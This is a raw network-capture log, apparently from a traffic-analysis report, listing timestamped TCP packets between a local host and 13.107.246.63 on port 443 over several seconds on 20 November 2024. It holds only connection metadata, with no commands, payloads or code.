                                                                                                                                                                                                                      Nov 20, 2024 17:42:38.253746033 CET4435000213.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:38.253837109 CET50002443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:38.253928900 CET50002443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:38.253928900 CET50002443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:38.253974915 CET4435000213.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:38.254002094 CET4435000213.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:38.257021904 CET50007443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:38.257060051 CET4435000713.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:38.257155895 CET50007443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:38.257330894 CET50007443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:38.257345915 CET4435000713.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:38.952198029 CET4435000413.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:38.952771902 CET50004443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:38.952831984 CET4435000413.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:38.953310966 CET50004443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:38.953342915 CET4435000413.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:38.956871986 CET4435000313.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:38.957245111 CET50003443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:38.957256079 CET4435000313.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:38.957690001 CET50003443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:38.957695007 CET4435000313.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:39.369353056 CET4435000513.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:39.370024920 CET50005443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:39.370049000 CET4435000513.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:39.370559931 CET50005443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:39.370567083 CET4435000513.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:39.373693943 CET4435000613.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:39.373999119 CET50006443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:39.374064922 CET4435000613.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:39.374368906 CET50006443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:39.374387026 CET4435000613.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:39.387217999 CET4435000413.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:39.387283087 CET4435000413.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:39.387384892 CET50004443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:39.387444019 CET4435000413.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:39.387612104 CET50004443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:39.387634039 CET4435000413.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:39.387670994 CET50004443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:39.388020039 CET4435000413.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:39.388101101 CET4435000413.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:39.388151884 CET50004443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:39.390662909 CET50008443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:39.390760899 CET4435000813.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:39.390849113 CET50008443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:39.391141891 CET50008443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:39.391175985 CET4435000813.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:39.413325071 CET4435000313.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:39.413408041 CET4435000313.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:39.413537979 CET50003443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:39.413753033 CET50003443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:39.413768053 CET4435000313.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:39.413777113 CET50003443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:39.413781881 CET4435000313.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:39.416503906 CET50009443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:39.416570902 CET4435000913.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:39.416661978 CET50009443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:39.416806936 CET50009443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:39.416841984 CET4435000913.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:39.830812931 CET4435000513.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:39.833745003 CET4435000513.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:39.833810091 CET4435000513.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:39.833820105 CET50005443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:39.833859921 CET50005443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:39.835503101 CET50005443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:39.835520029 CET4435000513.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:39.835536957 CET50005443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:39.835541964 CET4435000513.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:39.840058088 CET4435000613.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:39.842786074 CET4435000613.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:39.842858076 CET50006443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:39.842909098 CET4435000613.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:39.842952013 CET4435000613.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:39.843003035 CET50006443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:39.849863052 CET50006443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:39.849884033 CET4435000613.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:39.849895000 CET50006443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:39.849901915 CET4435000613.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:39.992723942 CET50010443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:39.992764950 CET4435001013.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:39.992830992 CET50010443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:39.993879080 CET50011443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:39.993953943 CET4435001113.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:39.994025946 CET50011443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:39.994110107 CET50010443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:39.994126081 CET4435001013.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:39.994574070 CET50011443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:39.994610071 CET4435001113.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:40.149065971 CET4435000713.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:40.149657011 CET50007443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:40.149673939 CET4435000713.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:40.150145054 CET50007443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:40.150150061 CET4435000713.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:40.585946083 CET4435000713.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:40.588587999 CET4435000713.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:40.588654041 CET50007443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:40.594367981 CET50007443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:40.594383001 CET4435000713.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:40.594393969 CET50007443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:40.594399929 CET4435000713.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:40.598536015 CET50012443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:40.598570108 CET4435001213.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:40.598627090 CET50012443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:40.599544048 CET50012443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:40.599558115 CET4435001213.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:41.189759970 CET4435000813.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:41.190510035 CET50008443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:41.190522909 CET4435000813.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:41.191025972 CET50008443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:41.191031933 CET4435000813.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:41.252929926 CET4435000913.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:41.253684998 CET50009443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:41.253715038 CET4435000913.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:41.254157066 CET50009443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:41.254167080 CET4435000913.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:41.632438898 CET4435000813.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:41.635401011 CET4435000813.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:41.635464907 CET50008443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:41.635488987 CET4435000813.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:41.635514021 CET4435000813.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:41.635566950 CET50008443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:41.635610104 CET50008443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:41.635622025 CET4435000813.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:41.635644913 CET50008443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:41.635649920 CET4435000813.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:41.638535976 CET50013443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:41.638566017 CET4435001313.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:41.638659954 CET50013443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:41.638847113 CET50013443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:41.638859987 CET4435001313.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:41.696831942 CET4435000913.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:41.700064898 CET4435000913.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:41.700124025 CET50009443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:41.700185061 CET50009443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:41.700201988 CET4435000913.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:41.700242996 CET50009443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:41.700253010 CET4435000913.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:41.703001976 CET50014443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:41.703025103 CET4435001413.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:41.703094959 CET50014443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:41.703257084 CET50014443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:41.703270912 CET4435001413.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:41.782599926 CET4435001013.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:41.783050060 CET50010443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:41.783066034 CET4435001013.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:41.783545017 CET50010443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:41.783550978 CET4435001013.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:41.829674959 CET4435001113.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:41.830260038 CET50011443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:41.830297947 CET4435001113.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:41.830735922 CET50011443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:41.830748081 CET4435001113.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:42.242620945 CET4435001013.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:42.245582104 CET4435001013.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:42.245707035 CET4435001013.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:42.245784998 CET50010443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:42.245876074 CET50010443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:42.245876074 CET50010443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:42.245908022 CET4435001013.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:42.245929956 CET4435001013.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:42.278929949 CET4435001113.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:42.278959036 CET4435001113.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:42.279082060 CET50011443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:42.279136896 CET4435001113.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:42.281544924 CET4435001113.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:42.283798933 CET50011443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:42.329993010 CET50011443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:42.329993010 CET50011443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:42.330039024 CET4435001113.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:42.330065012 CET4435001113.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:42.334445000 CET50015443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:42.334474087 CET4435001513.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:42.334701061 CET50015443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:42.335556984 CET50016443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:42.335681915 CET4435001613.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:42.335701942 CET50015443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:42.335715055 CET4435001513.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:42.335743904 CET50016443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:42.335839987 CET50016443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:42.335863113 CET4435001613.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:42.457714081 CET4435001213.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:42.466799974 CET50012443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:42.466814995 CET4435001213.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:42.467299938 CET50012443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:42.467304945 CET4435001213.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:42.911185026 CET4435001213.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:42.911252975 CET4435001213.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:42.911381006 CET4435001213.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:42.911465883 CET50012443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:42.911659002 CET50012443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:42.911678076 CET4435001213.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:42.911688089 CET50012443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:42.911693096 CET4435001213.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:42.915143967 CET50017443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:42.915177107 CET4435001713.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:42.915266037 CET50017443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:42.915446997 CET50017443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:42.915460110 CET4435001713.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:43.426642895 CET4435001313.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:43.427206993 CET50013443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:43.427222013 CET4435001313.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:43.427768946 CET50013443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:43.427772045 CET4435001313.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:43.582413912 CET4435001413.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:43.583085060 CET50014443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:43.583106041 CET4435001413.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:43.583597898 CET50014443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:43.583602905 CET4435001413.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:43.883460045 CET4435001313.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:43.886445999 CET4435001313.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:43.886528015 CET50013443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:43.886555910 CET50013443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:43.886567116 CET4435001313.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:43.886584044 CET50013443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:43.886589050 CET4435001313.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:43.889664888 CET50018443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:43.889744997 CET4435001813.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:43.889826059 CET50018443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:43.889986038 CET50018443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:43.890018940 CET4435001813.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:44.079703093 CET4435001513.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:44.080379009 CET50015443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:44.080391884 CET4435001513.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:44.080887079 CET50015443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:44.080890894 CET4435001513.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:44.104296923 CET4435001413.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:44.107680082 CET4435001413.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:44.107765913 CET50014443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:44.107842922 CET50014443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:44.107871056 CET4435001413.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:44.107887983 CET50014443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:44.107896090 CET4435001413.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:44.111336946 CET50019443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:44.111399889 CET4435001913.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:44.111493111 CET50019443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:44.111679077 CET50019443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:44.111696005 CET4435001913.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:44.122544050 CET4435001613.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:44.122955084 CET50016443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:44.123020887 CET4435001613.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:44.123413086 CET50016443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:44.123425961 CET4435001613.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:44.514906883 CET4435001513.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:44.518037081 CET4435001513.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:44.518145084 CET4435001513.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:44.518270969 CET50015443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:44.518395901 CET50015443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:44.518395901 CET50015443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:44.518409014 CET4435001513.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:44.518415928 CET4435001513.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:44.521507978 CET50020443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:44.521595955 CET4435002013.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:44.521698952 CET50020443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:44.521862030 CET50020443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:44.521897078 CET4435002013.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:44.680440903 CET4435001713.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:44.686919928 CET50017443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:44.686949015 CET4435001713.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:44.687472105 CET50017443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:44.687478065 CET4435001713.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:44.845024109 CET4435001613.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:44.848408937 CET4435001613.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:44.848850965 CET50016443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:44.848933935 CET50016443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:44.848933935 CET50016443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:44.848978043 CET4435001613.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:44.849009037 CET4435001613.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:44.851819038 CET50021443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:44.851852894 CET4435002113.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:44.851939917 CET50021443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:44.852091074 CET50021443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:44.852102995 CET4435002113.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:45.130523920 CET4435001713.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:45.133605957 CET4435001713.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:45.133697987 CET50017443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:45.133749962 CET50017443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:45.133775949 CET4435001713.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:45.133789062 CET50017443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:45.133795023 CET4435001713.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:45.136682987 CET50022443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:42:45.136794090 CET4435002213.107.246.63192.168.2.7
